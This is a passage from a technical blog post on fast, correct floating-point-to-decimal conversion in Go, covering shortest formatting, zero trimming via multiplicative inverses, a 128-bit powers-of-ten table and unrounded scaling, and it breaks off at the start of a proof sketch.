-moz-right;'><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>(</mo><mn>1/</mn><mo stretchy=false>(</mo><mn>¾</mn><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo stretchy=false>)</mo><mo stretchy=false>)</mo><mo>·</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><mn>10</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[isolating</mtext><mspace width='0.3em' /></mrow><mi>p</mi><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mrow><mo>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>¾</mn><mo>+</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mi>e</mi><mo>)</mo></mrow><mo>+</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[taking</mtext><mspace width='0.3em' /><mtext>log]</mtext></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>∈</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mrow><mo>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>¾</mn><mo>+</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mi>e</mi><mo>−</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>1</mn><mo 
stretchy=false>)</mo><mo>)</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[regrouping]</mtext></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mi>p</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mrow><mo>⌊</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>¾</mn><mo>+</mo><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /></mrow><mn>2</mn><mo stretchy=false>)</mo><mo>·</mo><mi>e</mi><mo>⌋</mo></mrow></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>[</mtext><mi>p</mi><mrow><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>an</mtext><mspace width='0.3em' /><mtext>integer]</mtext></mrow></mrow></mtd></mtr></mtable></math></div>
<p>
For the symmetric footprint, we can use <code>log10Pow2</code>,
but for the skewed footprint, we need a new approximation:
<div class=showcode><pre><span class=showcode-comment>// skewed computes the skewed footprint of m * 2**e,</span>
<span class=showcode-comment>// which is ⌊log₁₀ 3/4 * 2**e⌋ = ⌊e*(log₁₀ 2)-(log₁₀ 4/3)⌋.</span>
func skewed(e int) int {
return (e*631305 - 261663) >> 21
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L234-L237">fpfmt/fpfmt.go:234,237</a></div><div class=showcode-end></div>
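<p>
The magic constants deserve a sanity check.
Here is a small standalone program (mine, not part of the repository)
that compares <code>skewed</code> against a direct floating-point evaluation
of the formula in its comment and prints any disagreement;
the exponent range below is an assumption chosen to generously cover the exponents passed in:
<pre>package main

import (
	"fmt"
	"math"
)

func skewed(e int) int {
	return (e*631305 - 261663) >> 21
}

func main() {
	for e := -1100; e <= 1000; e++ {
		// float64 evaluation is adequate for a sanity check;
		// a rigorous check would use higher-precision arithmetic.
		want := int(math.Floor(float64(e)*math.Log10(2) - math.Log10(4.0/3.0)))
		if got := skewed(e); got != want {
			fmt.Println("mismatch at e =", e, got, want)
		}
	}
}
</pre>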
<p>
We should worry about a footprint with decimal width exactly 1,
since if <math><mi>f</mi></math> had an odd mantissa,
the midpoints would be excluded.
In that case, if the decimals were the exact midpoints,
there would be no decimal between them,
making the conversion invalid.
But it turns out we should not worry too much.
For a skewed footprint, <math><mrow><mn>¾</mn><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> can never be exactly 1,
because nothing can divide away the 3.
For a symmetric footprint, <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>=</mo><mn>1</mn></mrow></math>
can only happen for <math><mrow><mi>e</mi><mo>=</mo><mi>p</mi><mo>=</mo><mn>0</mn></mrow></math>,
but then scaling is a no-op,
so that the decimal integers are exactly the binary integers.
The non-integer midpoints map to non-integer decimals.
<p>
When we compute the decimal equivalents of the midpoints,
we will use ceiling and floor instead of rounding them,
to make sure the integer results are valid decimal answers.
If the mantissa <math><mi>m</mi></math> is odd, we will nudge the unrounded forms
inward slightly before taking the ceiling or floor,
since rounding will be away from <math><mi>m</mi></math>.
<p>
The Go code is:
<div class=showcode><pre><span class=showcode-comment>// Short computes the shortest formatting of f,</span>
<span class=showcode-comment>// using as few digits as possible that will still round trip</span>
<span class=showcode-comment>// back to the original float64.</span>
func Short(f float64) (d uint64, p int) {
const minExp = -1085
m, e := unpack64(f)
var min uint64
z := 11 <span class=showcode-comment>// extra zero bits at bottom of m; 11 for 53-bit m</span>
if m == 1<<63 && e > minExp {
p = -skewed(e + z)
min = m - 1<<(z-2) <span class=showcode-comment>// min = m - 1/4 * 2**(e+z)</span>
} else {
if e < minExp {
z = 11 + (minExp - e)
}
p = -log10Pow2(e + z)
min = m - 1<<(z-1) <span class=showcode-comment>// min = m - 1/2 * 2**(e+z)</span>
}
max := m + 1<<(z-1) <span class=showcode-comment>// max = m + 1/2 * 2**(e+z)</span>
odd := int(m>>z) & 1
pre := prescale(e, p, log2Pow10(p))
dmin := uscale(min, pre).nudge(+odd).ceil()
dmax := uscale(max, pre).nudge(-odd).floor()
if d = dmax / 10; d*10 >= dmin {
return trimZeros(d, -(p - 1))
}
if d = dmin; d < dmax {
d = uscale(m, pre).round()
}
return d, -p
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L198-L231">fpfmt/fpfmt.go:198,231</a></div><div class=showcode-end></div>
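<p>
As a quick illustration (my own example, not from the repository):
the shortest decimal that rounds back to the float64 0.3 is the single-digit form 3e-1,
so I would expect:
<pre>d, p := Short(0.3) // d == 3, p == -1, that is, 3e-1
</pre>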
<p>
Notice that this algorithm requires either two or three calls to <code>uscale</code>.
When the number being printed has only one valid representation
of the shortest length, we avoid the third call to <code>uscale</code>.
Also notice that the <code>prescale</code> result is shared by all three calls.
<p>
When <math><mrow><mi>m</mi><mo>=</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup></mrow></math>, <math><mrow><mtext><i>min</i></mtext><mo><</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>63</mn></msup></mrow></math>,
meaning it won’t be left shifted as far as possible
during the call to <code>uscale</code>.
Although we could detect this case and call <code>uscale</code>
with <math><mrow><mn>2</mn><mo>·</mo><mtext><i>min</i></mtext></mrow></math> and <math><mrow><mi>e</mi><mo>−</mo><mn>1</mn></mrow></math>,
using <math><mtext><i>min</i></mtext></math> unmodified is fine:
it is still shifted enough that the bits <code>uscale</code>
needs to return will stay in the high 64 bits of the 192-bit product,
and using the same <math><mi>e</mi></math>
lets us use the same <code>prescale</code> work for all three calls.
<a class=anchor href="#trimzero"><h3 id="trimzero">Trimming Zeros</h3></a>
<p>
The <code>trimZeros</code> function used in <code>Short</code> removes any trailing zeros from its argument,
updating the decimal power. An unoptimized version is:
<div class=showcode><pre><span class=showcode-comment>// trimZeros removes trailing zeros from x * 10**p.</span>
<span class=showcode-comment>// If x ends in k zeros, trimZeros returns x/10**k, p+k.</span>
<span class=showcode-comment>// It assumes that x ends in at most 16 zeros.</span>
func trimZeros(x uint64, p int) (uint64, int) {
if x%10 != 0 {
return x, p
}
x /= 10
p += 1
if x%100000000 == 0 {
x /= 100000000
p += 8
}
if x%10000 == 0 {
x /= 10000
p += 4
}
if x%100 == 0 {
x /= 100
p += 2
}
if x%10 == 0 {
x /= 10
p += 1
}
return x, p
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/unopt/fpfmt.go#L227-L253">fpfmt/unopt/fpfmt.go:227,253</a></div><div class=showcode-end></div>
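<p>
For example, tracing the unoptimized code by hand on a value with four trailing zeros (my example):
<pre>d, p := trimZeros(1230000, -7) // 1230000 * 10**-7 = 0.123
// d == 123, p == -3           // 123 * 10**-3 = 0.123
</pre>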
<p>
The initial removal of a single zero gives an early return for
the common case of having no zeros.
Otherwise, the code makes four additional checks that
collectively remove up to 16 more zeros.
For outputs with many zeros, these four checks run faster
than a loop removing one zero at a time.
<p>
When compiling this code,
the Go compiler reduces the remainder checks to multiplications
using the following well-known optimization.
An exact <code>uint64</code> division <math><mrow><mi>x</mi><mn>/</mn><mi>c</mi></mrow></math> where <math><mrow><mi>x</mi><MO>mod</MO><mi>c</mi><mo>=</mo><mn>0</mn></mrow></math>
can be implemented by <math><mrow><mi>x</mi><mo>·</mo><mi>m</mi></mrow></math> where <math><mi>m</mi></math>
is the <code>uint64</code> multiplicative inverse of <math><mi>c</mi></math>, meaning <math><mrow><mi>m</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo>=</mo><mn>1</mn></mrow></math>.
Since <math><mi>c</mi></math> is also the multiplicative inverse of <math><mi>m</mi></math>, <math><mrow><mi>x</mi><mo>·</mo><mi>m</mi></mrow></math> is
lossless—all the exact multiples of <math><mi>c</mi></math> map to all of <math><mrow><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mo stretchy=false>(</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo>−</mo><mn>1</mn><mo stretchy=false>)</mo><MO>/</MO><mi>c</mi><mo stretchy=false>]</mo></mrow></math>—so
the non-multiples are forced to map to larger values.
This observation gives a quick test for whether <math><mi>x</mi></math> is an exact multiple of <math><mi>c</mi></math>:
check whether <math><mrow><mi>x</mi><mo>·</mo><mi>m</mi><mo>≤</mo><mo stretchy=false>(</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo>−</mo><mn>1</mn><mo stretchy=false>)</mo><MO>/</MO><mi>c</mi></mrow></math>.
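<p>
For example, here is a minimal sketch (mine, not from the repository)
of that test for the odd divisor 5,
using the same inverse constant that reappears in the optimized <code>trimZeros</code> below:
<pre>const inv5 = 0xcccccccccccccccd // multiplicative inverse of 5 mod 2**64

// div5 reports whether x is a multiple of 5 and, if so, returns x/5.
func div5(x uint64) (q uint64, ok bool) {
	q = x * inv5
	return q, q <= ^uint64(0)/5
}
</pre>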
<p>
Only odd <math><mi>c</mi></math> have multiplicative inverses modulo powers of two,
so even divisors require more work.
To compute an exact division <math><mrow><mi>x</mi><MO>/</MO><mo stretchy=false>(</mo><mi>c</mi><MO><<</MO><mi>s</mi><mo stretchy=false>)</mo></mrow></math>,
we can use <math><mrow><mo stretchy=false>(</mo><mi>x</mi><mn>/</mn><mi>c</mi><mo stretchy=false>)</mo><MO>>></MO><mi>s</mi></mrow></math> instead.
To check for remainder, we need to check that those low <math><mi>s</mi></math>
bits are all zero before we shift them away.
We can merge that check with the range check by rotating those bits
into the high part instead of discarding them:
check whether <math><mrow><mi>x</mi><mo>·</mo><mi>m</mi><MO>↻></MO><mi>s</mi><mo>≤</mo><mo stretchy=false>(</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup><mo>−</mo><mn>1</mn><mo stretchy=false>)</mo><MO>/</MO><mi>c</mi></mrow></math>,
where <math><MO lspace='0' rspace='0'>↻></MO></math> is right rotate.
<p>
The Go compiler does this transformation automatically
for the <code>if</code> conditions in <code>trimZeros</code>,
but inside the <code>if</code> bodies, it does not reuse the
exact quotient it just computed.
I considered changing the compiler to recognize that pattern,
but instead I wrote out the remainder check by hand
in the optimized version, allowing me to reuse the computed exact quotients:
<div class=showcode><pre><span class=showcode-comment>// trimZeros removes trailing zeros from x * 10**p.</span>
<span class=showcode-comment>// If x ends in k zeros, trimZeros returns x/10**k, p+k.</span>
<span class=showcode-comment>// It assumes that x ends in at most 16 zeros.</span>
func trimZeros(x uint64, p int) (uint64, int) {
const (
maxUint64 = ^uint64(0)
inv5p8 = 0xc767074b22e90e21 <span class=showcode-comment>// inverse of 5**8</span>
inv5p4 = 0xd288ce703afb7e91 <span class=showcode-comment>// inverse of 5**4</span>
inv5p2 = 0x8f5c28f5c28f5c29 <span class=showcode-comment>// inverse of 5**2</span>
inv5 = 0xcccccccccccccccd <span class=showcode-comment>// inverse of 5</span>
)
<span class=showcode-comment>// Cut 1 zero, or else return.</span>
if d := bits.RotateLeft64(x*inv5, -1); d <= maxUint64/10 {
x = d
p += 1
} else {
return x, p
}
<span class=showcode-comment>// Cut 8 zeros, then 4, then 2, then 1.</span>
if d := bits.RotateLeft64(x*inv5p8, -8); d <= maxUint64/100000000 {
x = d
p += 8
}
if d := bits.RotateLeft64(x*inv5p4, -4); d <= maxUint64/10000 {
x = d
p += 4
}
if d := bits.RotateLeft64(x*inv5p2, -2); d <= maxUint64/100 {
x = d
p += 2
}
if d := bits.RotateLeft64(x*inv5, -1); d <= maxUint64/10 {
x = d
p += 1
}
return x, p
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L240-L277">fpfmt/fpfmt.go:240,277</a></div><div class=showcode-end></div>
<p>
This approach to trimming zeros is from Dragonbox.
For more about the general optimization,
see Warren’s <i>Hacker’s Delight</i> [<a class=footref id='fnref-34' href='#fn-34'>34</a>],
sections 10-16 and 10-17.
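<p>
The inverse constants themselves are easy to derive.
Here is one way (my sketch, not from the repository), using <code>math/big</code>:
<pre>// inverse returns the multiplicative inverse of c modulo 2**64; c must be odd.
func inverse(c uint64) uint64 {
	mod := new(big.Int).Lsh(big.NewInt(1), 64)
	v := new(big.Int).ModInverse(new(big.Int).SetUint64(c), mod)
	return v.Uint64()
}

// inverse(5) == 0xcccccccccccccccd, inverse(5*5) == 0x8f5c28f5c28f5c29, and so on.
</pre>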
<a class=anchor href="#fast_accurate_scaling"><h2 id="fast_accurate_scaling">Fast, Accurate Scaling</h2></a>
<p>
The conversion algorithms we examined are nice and simple.
For them to be fast, <code>uscale</code> needs to be fast while remaining correct.
Although multiplication by <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup></mrow></math> can be implemented by shifts,
<code>uscale</code> cannot actually compute or multiply by
<math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>—that would take too long when <math><mi>p</mi></math> is a large positive or negative number.
Instead, we can approximate <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> as a floating-point number <math><mrow><mtext><i>pm</i></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mtext><i>pe</i></mtext></msup></mrow></math> with a 128-bit mantissa,
looked up in a table indexed by <math><mi>p</mi></math>.
Specifically, we will use <math><mrow><mtext><i>pe</i></mtext><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow><mo>−</mo><mn>127</mn></mrow></math> and <math><mrow><mtext><i>pm</i></mtext><mo>=</mo><mrow><mo stretchy=false>⌈</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mtext><i>pe</i></mtext></msup><mo stretchy=false>⌉</mo></mrow></mrow></math>,
ensuring that <math><mrow><mtext><i>pm</i></mtext><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>127</mn></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>128</mn></msup><mo stretchy=false>)</mo></mrow></math>.
We will write a separate program to generate this table.
It emits Go code defining <code>pow10Min</code>, <code>pow10Max</code>, and <code>pow10Tab</code>:
<code>pow10Tab[0]</code> holds the entry for <math><mrow><mi>p</mi><mo>=</mo><mtext><code>pow10Min</code></mtext></mrow></math>.
To figure out how big the table needs to be,
we can analyze the three functions we just wrote.
<ul>
<li>
<code>FixedWidth</code> converts floating-point to decimal.
It needs to call <code>uscale</code> with a 53-bit <math><mi>x</mi></math>, <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1137</mn><mo>,</mo><mn>960</mn><mo stretchy=false>]</mo></mrow></math>, and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>307</mn><mo>,</mo><mn>341</mn><mo stretchy=false>]</mo></mrow></math>.
<li>
<code>Short</code> also converts floating-point to decimal.
It needs to call <code>uscale</code> with a 55-bit <math><mi>x</mi></math>, <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1137</mn><mo>,</mo><mn>960</mn><mo stretchy=false>]</mo></mrow></math>, and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>292</mn><mo>,</mo><mn>324</mn><mo stretchy=false>]</mo></mrow></math>.
<li>
<code>Parse</code> converts decimal to floating-point.
It needs to call <code>uscale</code> with a 64-bit <math><mi>x</mi></math> and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>343</mn><mo>,</mo><mn>289</mn><mo stretchy=false>]</mo></mrow></math>.
(Outside that range of <math><mi>p</mi></math>, <code>Parse</code> can return 0 or infinity.)</ul>
<p>
So the table needs to provide answers for <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>343</mn><mo>,</mo><mn>341</mn><mo stretchy=false>]</mo></mrow></math>.
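<p>
To make the table concrete, here is a sketch (mine, not the actual generator program)
of how a single entry could be computed with <code>math/big</code>,
returning the two 64-bit halves of <math><mtext><i>pm</i></mtext></math> along with <math><mtext><i>pe</i></mtext></math>:
<pre>// pow10Entry computes pm (as hi<<64 + lo) and pe for a given p:
// pm = ⌈10**p / 2**pe⌉ with pe = ⌊log₂ 10**p⌋ - 127, so pm lands in [2**127, 2**128).
// Since 10**p = 5**p · 2**p, only the 5**|p| part needs big-integer work;
// the power of two folds into pe. Uses math/big.
func pow10Entry(p int) (hi, lo uint64, pe int) {
	abs := p
	if abs < 0 {
		abs = -abs
	}
	pow5 := new(big.Int).Exp(big.NewInt(5), big.NewInt(int64(abs)), nil)
	b := pow5.BitLen()
	pm := new(big.Int)
	if p >= 0 {
		if b <= 128 {
			pm.Lsh(pow5, uint(128-b)) // exact: shift 5**p into [2**127, 2**128)
		} else {
			ceilDiv(pm, pow5, new(big.Int).Lsh(big.NewInt(1), uint(b-128)))
		}
		pe = b + p - 128
	} else {
		// 10**p = 2**p / 5**(-p): pm = ⌈2**(b+127) / 5**(-p)⌉.
		ceilDiv(pm, new(big.Int).Lsh(big.NewInt(1), uint(b+127)), pow5)
		pe = p - b - 127
	}
	return new(big.Int).Rsh(pm, 64).Uint64(), pm.Uint64(), pe
}

// ceilDiv sets z = ⌈x/y⌉ for positive x, y.
func ceilDiv(z, x, y *big.Int) {
	z.Add(x, new(big.Int).Sub(y, big.NewInt(1)))
	z.Div(z, y)
}
</pre>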
<p>
If <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>≈</mo><mtext><i>pm</i></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mtext><i>pe</i></mtext></msup></mrow></math>, then <math><mrow><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>≈</mo><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>e</mi><mo>+</mo><mtext><i>pe</i></mtext></mrow></msup></mrow></math>.
In all of our algorithms, the result of <code>uscale</code> was always small—at most 64 bits.
Since <math><mtext><i>pm</i></mtext></math> is 128 bits and <math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext></mrow></math> is even bigger, <math><mrow><mi>e</mi><mo>+</mo><mtext><i>pe</i></mtext></mrow></math> must be negative,
so this computation is
<code>(x*pm) >> -(e+pe)</code>.
Because of the ceiling, <math><mtext><i>pm</i></mtext></math> may be too large by an error <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo><</mo><mn>1</mn></mrow></math>,
so <math><mrow><mi>x</mi><mo>·</mo><mtext><i>pm</i></mtext></mrow></math> may be too large by an error <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub><mo>=</mo><mi>x</mi><mo>·</mo><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo><</mo><mi>x</mi></mrow></math>.
To round exactly, we care whether any of the shifted bits is 1,
but <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>1</mn></msub></mrow></math> may change the low <math><mrow><mtext>bits</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math> bits,
so we can’t trust them.
Instead, we will throw them away
and use only the upper bits to compute our unrounded number.
That is the entire idea!
<p>
Now let’s look at the implementation.
The <code>prescale</code> function returns a <code>scaler</code> with <math><mtext><i>pm</i></mtext></math> and a shift count <math><mi>s</mi></math>:
<div class=showcode><pre><span class=showcode-comment>// A scaler holds derived scaling constants for a given e, p pair.</span>
type scaler struct {
pm pmHiLo
s int
}
<span class=showcode-comment>// A pmHiLo represents hi<<64 + lo.</span>
type pmHiLo struct {
hi uint64
lo uint64
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/unopt/fpfmt.go#L256-L265">fpfmt/unopt/fpfmt.go:256,265</a></div><div class=showcode-end></div>
<p>
We want the shift count to reserve two extra bits for the unrounded
representation and to apply to the top 64-bit word of the 192-bit product,
which gives this formula:<div class=math><math display=block><mtable><mtr><mtd><mi>s</mi></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mo stretchy=false>(</mo><mi>e</mi><mo>+</mo><mtext><i>pe</i></mtext><mo stretchy=false>)</mo><mo>−</mo><mn>2</mn><mo>−</mo><mo stretchy=false>(</mo><mn>192</mn><mo>−</mo><mn>64</mn><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mo stretchy=false>(</mo><mi>e</mi><mo>+</mo><mrow><mo stretchy=false>⌊</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow><mo>−</mo><mn>127</mn><mo stretchy=false>)</mo><mo>−</mo><mn>2</mn><mo>−</mo><mn>128</mn></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>−</mo><mo stretchy=false>(</mo><mi>e</mi><mo>+</mo><mrow><mo stretchy=false>⌊</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow><mo>+</mo><mn>3</mn><mo stretchy=false>)</mo></mrow></mtd></mtr></mtable></math></div>
<p>
That translates directly to Go:
<div class=showcode><pre><span class=showcode-comment>// prescale returns the scaling constants for e, p.</span>
<span class=showcode-comment>// lp must be log2Pow10(p).</span>
func prescale(e, p, lp int) scaler {
return scaler{pm: pow10Tab[p-pow10Min], s: -(e + lp + 3)}
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L292-L295">fpfmt/fpfmt.go:292,295</a></div><div class=showcode-end></div>
<p>
In <code>uscale</code>, since the caller left-justified <math><mi>x</mi></math> to 64 bits,
discarding the low <math><mrow><mtext>bits</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math> bits means discarding the
lowest 64 bits of the product, which we skip computing entirely.
Then we use the middle 64-bit word and the low <math><mi>s</mi></math> bits
of the upper word to set the sticky bit in the result.
<div class=showcode><pre><span class=showcode-comment>// uscale returns unround(x * 2**e * 10**p).</span>
<span class=showcode-comment>// The caller should pass c = prescale(e, p, log2Pow10(p))</span>
<span class=showcode-comment>// and should have left-justified x so its high bit is set.</span>
func uscale(x uint64, c scaler) unrounded {
hi, mid := bits.Mul64(x, c.pm.hi)
mid2, _ := bits.Mul64(x, c.pm.lo)
mid, carry := bits.Add64(mid, mid2, 0)
hi += carry
sticky := bool2[unrounded](mid != 0 || hi&((1<<c.s)-1) != 0)
return unrounded(hi>>c.s) | sticky
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/unopt/fpfmt.go#L302-L311">fpfmt/unopt/fpfmt.go:302,311</a></div><div class=showcode-end></div>
<p>
It is mind-boggling that this works, but it does.
Of course, you shouldn’t take my word for it.
We have to prove it correct.
<a class=anchor href="#sketch_of_a_proof_of_fast_scaling"><h2 id="sketch_of_a_proof_of_fast_scaling">Sketch of a Proof of Fast Scaling</h2></a>
<p>
To prove that our fast <code>uscale</code> algorithm is correct,
there are three cases: small positive <math><mi>p</mi></math>,
small negative <math><mi>p</mi></math>,
and large <math><mi>p</mi></math>.
The actual proof, especially for large <math><mi>p</mi></math>,
is non-trivial,
and the details are quite a detour from
our fast scaling implementations,
so this section only sketches the basic ideas.
For the details, see the accompanying post, “<a href="fp-proof">Fast Unrounded Scaling: Proof by Ivy</a>.”
<p>
Remember from the previous section that <math><mrow><mtext><i>pm</i></mtext><mo>=</mo><mrow><mo stretchy=false>⌈</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mtext><i>pe</i></mtext></msup><mo stretchy=false>⌉</mo></mrow><mo>=</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mtext><i>pe</i></mtext></msup><mo>+</mo><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub></mrow></math> for some <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo><</mo><mn>1</mn></mrow></math>.
Since <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>=</mo><mn>5</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>,
<math><mtext><i>pm</i></mtext></math>’s 128 bits need only represent the <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> part; the <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> can always be handled by <math><mtext><i>pe</i></mtext></math>.
<p>
For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>27</mn><mo stretchy=false>)</mo></mrow></math>, <math><mrow><mn>5</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> fits in the top 64 bits of the 128-bit <math><mtext><i>pm</i></mtext></math>.
Since <math><mtext><i>pm</i></mtext></math> is exact,
the only possible error is introduced by discarding the bottom <math><mrow><mtext>bits</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math> bits.
Since the bottom 64 bits of <math><mtext><i>pm</i></mtext></math> are zero,
the bits we discard are all zero.
So <code>uscale</code> is correct for small positive <math><mi>p</mi></math>.
<p>
For <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>27</mn><mo>,</mo><MO form='prefix'>−</MO><mn>1</mn><mo stretchy=false>]</mo></mrow></math>,
